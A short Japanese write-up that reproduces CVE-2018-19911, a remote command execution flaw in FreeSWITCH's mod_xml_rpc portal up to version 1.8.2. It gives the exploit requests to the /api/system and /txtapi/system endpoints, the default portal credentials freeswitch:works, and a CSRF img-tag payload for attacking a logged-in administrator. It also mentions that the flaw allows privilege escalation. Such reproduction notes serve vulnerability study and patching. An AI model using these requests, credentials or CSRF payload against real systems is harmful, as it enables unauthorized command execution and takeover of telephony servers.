
freeswitch 全バージョン リモートコマンド実行 (CVE-2018-19911)
version:<=1.8.2
module:mod_xml_rpc
合計3つのバージョンをテストしました。(download url:http://files.freeswitch.org/)
freeswitch1.5.15 Windows版をインストール(http://files.freeswitch.org/windows/installer/x64/freeswitch.msi)
コンソールを開き、次のように入力します: load mod_xml_rpc (freeswitchポータルをロード)
ローカルポート8080にアクセスし、
http://127.0.0.1:8080/portal/index.html
コンソールに入力
api("system calc")またはapi("bg_system calc")

インターフェースに直接リクエストすることもできます
http://127.0.0.1:8080/txtapi/system?calc または
http://127.0.0.1:8080/api/system?calc



freeswitchポータルのデフォルトのアカウントとパスワードは freeswitch:works です。
自分で freeswitch_rce.py を使って確認できます。
または、CSRFを使用してログイン中の管理者を攻撃します。
<img src="http://127.0.0.1:8080/api/system?calc">

freeswitchは多くの場合高い権限で実行されるため、特権昇格の効果も達成できます。